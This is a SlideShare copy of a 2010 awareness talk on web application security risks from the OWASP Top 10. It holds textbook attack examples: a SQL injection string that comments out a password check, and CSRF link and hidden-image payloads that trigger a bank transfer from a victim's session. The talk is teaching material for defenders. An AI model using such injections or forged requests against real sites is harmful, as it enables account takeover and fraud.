SlideShare ist ein Scribd-Unternehmen logo
1 von 30
Downloaden Sie, um offline zu lesen
is the web @ risk ?
              World Internet Project Meeting 2010

                              ISCTE-IUL/SoTA/ADETTI-IUL        Carlos Serrão
    Instituto Superior de Ciências do Trabalho e da Empresa    carlos.serrao@iscte.pt
                           Instituto Universitário de Lisboa   carlos.j.serrao@gmail.com
                      School of Technology and Architecture
                                                  ADETTI-IUL   http://www.carlosserrao.net
                                                               http://blog.carlosserrao.net
                                                               http://www.linkedin.com/in/carlosserrao
Is the Web …
           … at risk?
           … a risk?
           … putting YOU at risk?


WHY?          HOW?
        WHEN?
The Internet…
          … and the WWW,


in the   beg   inning      .
in the beginning...




      Vinton Gray Cerf               Robert Elliot Kahn



                … a.k.a. the “Internet fathers”
The Internet was created…
          … as an ubiquitous

          … decentralized

          … standardized

          … global

          … interconnected

          … digital


… communications channel.
in the beginning...




            (Sir) Tim Berners Lee


          … a.k.a. the “WWW father”
The WWW was created!

A system of
interlinked
hypertext documents
accessed via the
Internet.

Infinite worldwide
knowledge access.
growth
evolving, growing
network
   Small data part on    Large amounts of      Data on the Cloud
   a specific web-site   data on a large
   (or limited number    number of sites       Applications on the
   of web-sites)         Applications on the   Web and Cloud
                         desktop and Web
   Applications on the
                         (more and more)       Data almost
   desktop
                         Part of the data      inexistent on the
   Most data is on the   still on desktop      desktop (still on
   desktop               (but also mobile)     mobile)

   Data processing on    Data processing on    Data processing
   the desktop           the desktop, but      almost inexistent
                         also on the web

 user
evolving, growing
network
   Small data part on    Large amounts of      Data on the Cloud
   a specific web-site   data on a large
   (or limited number    number of sites       Applications on the
   of web-sites)         Applications on the   Web and Cloud
                         desktop and Web
   Applications on the
                         (more and more)       Data almost
   desktop
                         Part of the data      inexistent on the
   Most data is on the   still on desktop      desktop (still on
   desktop               (but also mobile)     mobile)

   Data processing on    Data processing on    Data processing
   the desktop           the desktop, but      almost inexistent
                         also on the web

 user
evolving, growing
network
   Small data part on    Large amounts of      Data on the Cloud
   a specific web-site   data on a large
   (or limited number    number of sites       Applications on the
   of web-sites)         Applications on the   Web and Cloud
                         desktop and Web
   Applications on the
                         (more and more)       Data almost
   desktop
                         Part of the data      inexistent on the
   Most data is on the   still on desktop      desktop (still on
   desktop               (but also mobile)     mobile)

   Data processing on    Data processing on    Data processing
   the desktop           the desktop, but      almost inexistent
                         also on the web

 user
security++
    what do we have today?
       anti-virus

       anti-malware

       anti-spyware

       firewalls

       intrusion    detection systems
       …

       are   they enough?
security++
    YES, but…
       dothey protect the user from the web
       applications?

       cana Web application be compromised to
       hurt legitimate users?

       sure   it can.
security++
    How?
       Do   you trust your favorite web-applications?
         Google
         Gmail

       Doyou trust your favorite social-web
       applications?
         Facebook
         Twitter

       Do you trust your homebanking?
       Do you trust your government web-sites?
security++
                                      The security perimeter has huge
                                      security holes in the application
Application Layer




                                      layer




                                                                                           Legacy Systems




                                                                                                                                         Human Resrcs
                                                                                                            Web Services
                                                                                                                           Directories
                                              Custom Developed




                                                                               Databases
                                              Application Code




                                                                                                                                                        Billing
                    APPLICATION
                    ATTACK




                                               App Server
                                               Web Server
Network Layer




                                               Hardened OS




                                                                    Firewall
                                  Firewall
implications…
security trends




  problem types   typical problems on web apps
the security risks




           http://www.owasp.org/index.php/Top_10
security risks
    considering the three most important
       A1: Injection
       A2: Cross Site Scripting (XSS)

       A5: Cross Site Request Forgery (CSRF)
A1: Injection
                what if?
A1: Injection
                           what if?




  SELECT * FROM users usr
  WHERE usr.username = ‘admin’;--’
  AND usr.password=’bb21158c733229347bd4e681891e213d94c685be’
A1: Injection
                what if?
any input from the
web app user can be
an attack vector
A2: Cross Site Scripting (XSS)
    injecting malicious payload on the web
     app from the end-user side to be
     redirected to other users (victims)
A2: Cross Site Scripting (XSS)
        1   Attacker sets the trap – update my profile

                                                    Application with
                                                    stored XSS
                     Attacker enters a
                                                    vulnerability
                     malicious script into a
                     web page that stores
                     the data on the server




                                                                                     Knowledge Mgmt
                                                                                     Communication
                                                                    Administration




                                                                                     Bus. Functions
                                                                                     E-Commerce
                                                                    Transactions
        2   Victim views page – sees attacker profile




                                                         Accounts
                                                         Finance
                                                          Custom Code


                     Script runs inside
                     victim’s browser with
                     full access to the DOM
                     and cookies


 3   Script silently sends attacker Victim’s session cookie
A5: Cross Site Request Forgery (CSRF)

    an attacker can build its own malicious
     website and initiate request on the user’s
     browser
A5: Cross Site Request Forgery (CSRF)

        Attacker sets the trap on some website on the internet
    1       (or simply via an e-mail)




                                                   Application with CSRF
                      Hidden <img> tag             vulnerability
                      contains attack
                      against vulnerable
                      site




                                                                                 Knowledge Mgmt
                                                                                 Communication
                                                                Administration




                                                                                 Bus. Functions
                                                                Transactions



                                                                                 E-Commerce
                                                     Accounts
                                                     Finance
        While logged into vulnerable site,
    2      victim views attacker site
                                                      Custom Code


                                                          3
                                                     Vulnerable site sees
                   <img> tag loaded by               legitimate request
                   browser – sends GET               from victim and
                   request (including                performs the action
                   credentials) to                   requested
                   vulnerable site
A5: Cross Site Request Forgery (CSRF)

                             Alice                    transfer 100€ to Bob
                                                                              Bob
                                                      through bank.com

                                  POST http://bank.com/transfer.do HTTP/1.1
                                  ...
                                  ...
                                  ...
                                  Content-Length: 19;

                                  acct=BOB&amount=100



         realizes that the same bank.com web application can execute
Pirate   the transfer using a URL with parameters
         GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1

         will try to use Alice to transfer 100.000€ to its own account
         http://bank.com/transfer.do?acct=MARIA&amount=100000

         sends an HTML email to Alice with an URL to click
         <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my
         Pictures!</a>

         or, sends an HTML email to Alice with a image to hide the attack
         <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1"
         height="1" border="0">

Alice    if Alice is authenticated at bank.com with an active session
         the transfer is performed
consequences



               This is serious!!!



               And we are just
               looking at the
               tip of the
               iceberg!
[quick] conclusions
  Extra-care with the web applications you
   trust your data
  Extra-care on the way you handle your
   email
  Always act suspicious upon something

   “strange” on the web
  WebApp developers take care on what you

   do – your code is part of the security
   perimeter

Weitere ähnliche Inhalte

Andere mochten auch

Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoidslicklash
 
Eoptionsonline-HP Proliant Servers,Workstations
Eoptionsonline-HP Proliant Servers,WorkstationsEoptionsonline-HP Proliant Servers,Workstations
Eoptionsonline-HP Proliant Servers,Workstationseoptionsonline
 
Risk Oriented Testing of Web-Based Applications
Risk Oriented Testing of Web-Based ApplicationsRisk Oriented Testing of Web-Based Applications
Risk Oriented Testing of Web-Based ApplicationsPaxcel Technologies
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityAbdul Wahid
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security TutorialNeil Matatall
 

Andere mochten auch (7)

Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Eoptionsonline-HP Proliant Servers,Workstations
Eoptionsonline-HP Proliant Servers,WorkstationsEoptionsonline-HP Proliant Servers,Workstations
Eoptionsonline-HP Proliant Servers,Workstations
 
Risk Oriented Testing of Web-Based Applications
Risk Oriented Testing of Web-Based ApplicationsRisk Oriented Testing of Web-Based Applications
Risk Oriented Testing of Web-Based Applications
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
2008: Web Application Security Tutorial
2008: Web Application Security Tutorial2008: Web Application Security Tutorial
2008: Web Application Security Tutorial
 

Ähnlich wie Is the Web at Risk?

Risico's Web 2.0
Risico's Web 2.0Risico's Web 2.0
Risico's Web 2.0hnzz pronk
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud appsCenzic
 
Application Of A Web Server
Application Of A Web ServerApplication Of A Web Server
Application Of A Web ServerBrittany Pope
 
Little.story.it.architecture
Little.story.it.architectureLittle.story.it.architecture
Little.story.it.architectureÉric Grall
 
Develop Android City Tour Guide Application Using Web...
Develop Android City Tour Guide Application Using Web...Develop Android City Tour Guide Application Using Web...
Develop Android City Tour Guide Application Using Web...Jennifer Cruz
 
Patterns of Cloud Applications Using Microsoft Azure Services Platform
Patterns of Cloud Applications Using Microsoft Azure Services PlatformPatterns of Cloud Applications Using Microsoft Azure Services Platform
Patterns of Cloud Applications Using Microsoft Azure Services PlatformDavid Chou
 
Cloud native computing
Cloud native computingCloud native computing
Cloud native computingAnsar Gill
 
Cloud Architectures for Alpha Dogs!
Cloud Architectures for Alpha Dogs!Cloud Architectures for Alpha Dogs!
Cloud Architectures for Alpha Dogs!Vikas Gupta
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsBhargav Modi
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secureEoin Keary
 
ISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelAditya K Sood
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Modern Web Development (2018)
Modern Web Development (2018)Modern Web Development (2018)
Modern Web Development (2018)Randy Connolly
 
The Threats Of Open Web Application Security
The Threats Of Open Web Application SecurityThe Threats Of Open Web Application Security
The Threats Of Open Web Application SecurityDiana Oliva
 
Research challenges and issues in web security
Research challenges and issues in web securityResearch challenges and issues in web security
Research challenges and issues in web securityIAEME Publication
 
Development Model for The Cloud
Development Model for The CloudDevelopment Model for The Cloud
Development Model for The Cloudumityalcinalp
 
International Journal of Computational Engineering Research(IJCER)
International Journal of Computational Engineering Research(IJCER)International Journal of Computational Engineering Research(IJCER)
International Journal of Computational Engineering Research(IJCER)ijceronline
 

Ähnlich wie Is the Web at Risk? (20)

Risico's Web 2.0
Risico's Web 2.0Risico's Web 2.0
Risico's Web 2.0
 
B&W Netsparker overview
B&W Netsparker overviewB&W Netsparker overview
B&W Netsparker overview
 
Security in the cloud protecting your cloud apps
Security in the cloud   protecting your cloud appsSecurity in the cloud   protecting your cloud apps
Security in the cloud protecting your cloud apps
 
Application Of A Web Server
Application Of A Web ServerApplication Of A Web Server
Application Of A Web Server
 
Little.story.it.architecture
Little.story.it.architectureLittle.story.it.architecture
Little.story.it.architecture
 
Nebezpecny Internet Novejsi Verze
Nebezpecny Internet Novejsi VerzeNebezpecny Internet Novejsi Verze
Nebezpecny Internet Novejsi Verze
 
Develop Android City Tour Guide Application Using Web...
Develop Android City Tour Guide Application Using Web...Develop Android City Tour Guide Application Using Web...
Develop Android City Tour Guide Application Using Web...
 
Patterns of Cloud Applications Using Microsoft Azure Services Platform
Patterns of Cloud Applications Using Microsoft Azure Services PlatformPatterns of Cloud Applications Using Microsoft Azure Services Platform
Patterns of Cloud Applications Using Microsoft Azure Services Platform
 
Cloud native computing
Cloud native computingCloud native computing
Cloud native computing
 
Cloud Architectures for Alpha Dogs!
Cloud Architectures for Alpha Dogs!Cloud Architectures for Alpha Dogs!
Cloud Architectures for Alpha Dogs!
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weapons
 
We cant hack ourselves secure
We cant hack ourselves secureWe cant hack ourselves secure
We cant hack ourselves secure
 
ISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection ModelISSA Journal Paper - JavaScript Infection Model
ISSA Journal Paper - JavaScript Infection Model
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Modern Web Development (2018)
Modern Web Development (2018)Modern Web Development (2018)
Modern Web Development (2018)
 
The Threats Of Open Web Application Security
The Threats Of Open Web Application SecurityThe Threats Of Open Web Application Security
The Threats Of Open Web Application Security
 
Intro to web dev
Intro to web devIntro to web dev
Intro to web dev
 
Research challenges and issues in web security
Research challenges and issues in web securityResearch challenges and issues in web security
Research challenges and issues in web security
 
Development Model for The Cloud
Development Model for The CloudDevelopment Model for The Cloud
Development Model for The Cloud
 
International Journal of Computational Engineering Research(IJCER)
International Journal of Computational Engineering Research(IJCER)International Journal of Computational Engineering Research(IJCER)
International Journal of Computational Engineering Research(IJCER)
 

Mehr von Carlos Serrao

Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"
Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"
Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"Carlos Serrao
 
OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...
OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...
OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...Carlos Serrao
 
Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]
Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]
Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]Carlos Serrao
 
A OWASP e a Segurança Aplicacional para a Web
A OWASP e a Segurança Aplicacional para a WebA OWASP e a Segurança Aplicacional para a Web
A OWASP e a Segurança Aplicacional para a WebCarlos Serrao
 
Segurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisSegurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisCarlos Serrao
 
Segurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisSegurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisCarlos Serrao
 
OWASP e o desenvolvimento seguro de aplicações para a Web
OWASP e o desenvolvimento seguro de aplicações para a WebOWASP e o desenvolvimento seguro de aplicações para a Web
OWASP e o desenvolvimento seguro de aplicações para a WebCarlos Serrao
 
Principios básicos de segurança on-line
Principios básicos de segurança on-linePrincipios básicos de segurança on-line
Principios básicos de segurança on-lineCarlos Serrao
 
To DRM or not to DRM?
To DRM or not to DRM?To DRM or not to DRM?
To DRM or not to DRM?Carlos Serrao
 
OWASP presentation on FISTA2011
OWASP presentation on FISTA2011OWASP presentation on FISTA2011
OWASP presentation on FISTA2011Carlos Serrao
 
Análise de Vulnerabilidades em Aplicações na Web Nacional
Análise de Vulnerabilidades em Aplicações na Web NacionalAnálise de Vulnerabilidades em Aplicações na Web Nacional
Análise de Vulnerabilidades em Aplicações na Web NacionalCarlos Serrao
 
Segurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisSegurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisCarlos Serrao
 
OWASP, PT.OWASP, IBWAS'10 & Cia.
OWASP, PT.OWASP, IBWAS'10 & Cia.OWASP, PT.OWASP, IBWAS'10 & Cia.
OWASP, PT.OWASP, IBWAS'10 & Cia.Carlos Serrao
 
Owasp@iscte iul ferramentas-analise_vulnerabilidades
Owasp@iscte iul ferramentas-analise_vulnerabilidadesOwasp@iscte iul ferramentas-analise_vulnerabilidades
Owasp@iscte iul ferramentas-analise_vulnerabilidadesCarlos Serrao
 
OWASP@ ISCTE-IUL, Segurança em PHP
OWASP@ ISCTE-IUL, Segurança em PHPOWASP@ ISCTE-IUL, Segurança em PHP
OWASP@ ISCTE-IUL, Segurança em PHPCarlos Serrao
 
OWASP @ ISCTE-IUL, OWASP Top 10 2010
OWASP @ ISCTE-IUL, OWASP Top 10 2010OWASP @ ISCTE-IUL, OWASP Top 10 2010
OWASP @ ISCTE-IUL, OWASP Top 10 2010Carlos Serrao
 
OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)
OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)
OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)Carlos Serrao
 
OWASP @ ISCTE-IUL, Criptografia em PHP
OWASP @ ISCTE-IUL, Criptografia em PHPOWASP @ ISCTE-IUL, Criptografia em PHP
OWASP @ ISCTE-IUL, Criptografia em PHPCarlos Serrao
 
OWASP @ ISCTE-IUL, OWASP e OWASP Portugal
OWASP @ ISCTE-IUL, OWASP e OWASP PortugalOWASP @ ISCTE-IUL, OWASP e OWASP Portugal
OWASP @ ISCTE-IUL, OWASP e OWASP PortugalCarlos Serrao
 

Mehr von Carlos Serrao (20)

Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"
Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"
Prevenir o "ransomware" - Guia da OWASP para prevenção do "ransomware"
 
OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...
OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...
OWASP Mobile Top 10 - Principais Riscos no Desenvolvimento Seguro de Aplicaçõ...
 
OWASP Mobile Top 10
OWASP Mobile Top 10OWASP Mobile Top 10
OWASP Mobile Top 10
 
Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]
Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]
Vamos tirar uma selfie? [... como a privacidade morreu e ninguém nos avisou]
 
A OWASP e a Segurança Aplicacional para a Web
A OWASP e a Segurança Aplicacional para a WebA OWASP e a Segurança Aplicacional para a Web
A OWASP e a Segurança Aplicacional para a Web
 
Segurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisSegurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes Sociais
 
Segurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisSegurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes Sociais
 
OWASP e o desenvolvimento seguro de aplicações para a Web
OWASP e o desenvolvimento seguro de aplicações para a WebOWASP e o desenvolvimento seguro de aplicações para a Web
OWASP e o desenvolvimento seguro de aplicações para a Web
 
Principios básicos de segurança on-line
Principios básicos de segurança on-linePrincipios básicos de segurança on-line
Principios básicos de segurança on-line
 
To DRM or not to DRM?
To DRM or not to DRM?To DRM or not to DRM?
To DRM or not to DRM?
 
OWASP presentation on FISTA2011
OWASP presentation on FISTA2011OWASP presentation on FISTA2011
OWASP presentation on FISTA2011
 
Análise de Vulnerabilidades em Aplicações na Web Nacional
Análise de Vulnerabilidades em Aplicações na Web NacionalAnálise de Vulnerabilidades em Aplicações na Web Nacional
Análise de Vulnerabilidades em Aplicações na Web Nacional
 
Segurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes SociaisSegurança e Privacidade em Redes Sociais
Segurança e Privacidade em Redes Sociais
 
OWASP, PT.OWASP, IBWAS'10 & Cia.
OWASP, PT.OWASP, IBWAS'10 & Cia.OWASP, PT.OWASP, IBWAS'10 & Cia.
OWASP, PT.OWASP, IBWAS'10 & Cia.
 
Owasp@iscte iul ferramentas-analise_vulnerabilidades
Owasp@iscte iul ferramentas-analise_vulnerabilidadesOwasp@iscte iul ferramentas-analise_vulnerabilidades
Owasp@iscte iul ferramentas-analise_vulnerabilidades
 
OWASP@ ISCTE-IUL, Segurança em PHP
OWASP@ ISCTE-IUL, Segurança em PHPOWASP@ ISCTE-IUL, Segurança em PHP
OWASP@ ISCTE-IUL, Segurança em PHP
 
OWASP @ ISCTE-IUL, OWASP Top 10 2010
OWASP @ ISCTE-IUL, OWASP Top 10 2010OWASP @ ISCTE-IUL, OWASP Top 10 2010
OWASP @ ISCTE-IUL, OWASP Top 10 2010
 
OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)
OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)
OWASP @ ISCTE-IUL - OWASP Top 10 (v2010)
 
OWASP @ ISCTE-IUL, Criptografia em PHP
OWASP @ ISCTE-IUL, Criptografia em PHPOWASP @ ISCTE-IUL, Criptografia em PHP
OWASP @ ISCTE-IUL, Criptografia em PHP
 
OWASP @ ISCTE-IUL, OWASP e OWASP Portugal
OWASP @ ISCTE-IUL, OWASP e OWASP PortugalOWASP @ ISCTE-IUL, OWASP e OWASP Portugal
OWASP @ ISCTE-IUL, OWASP e OWASP Portugal
 

Kürzlich hochgeladen

Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?IES VE
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 

Kürzlich hochgeladen (20)

Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 

Is the Web at Risk?

  • 1. is the web @ risk ? World Internet Project Meeting 2010 ISCTE-IUL/SoTA/ADETTI-IUL Carlos Serrão Instituto Superior de Ciências do Trabalho e da Empresa carlos.serrao@iscte.pt Instituto Universitário de Lisboa carlos.j.serrao@gmail.com School of Technology and Architecture ADETTI-IUL http://www.carlosserrao.net http://blog.carlosserrao.net http://www.linkedin.com/in/carlosserrao
  • 2. Is the Web … … at risk? … a risk? … putting YOU at risk? WHY? HOW? WHEN?
  • 3. The Internet… … and the WWW, in the beg inning .
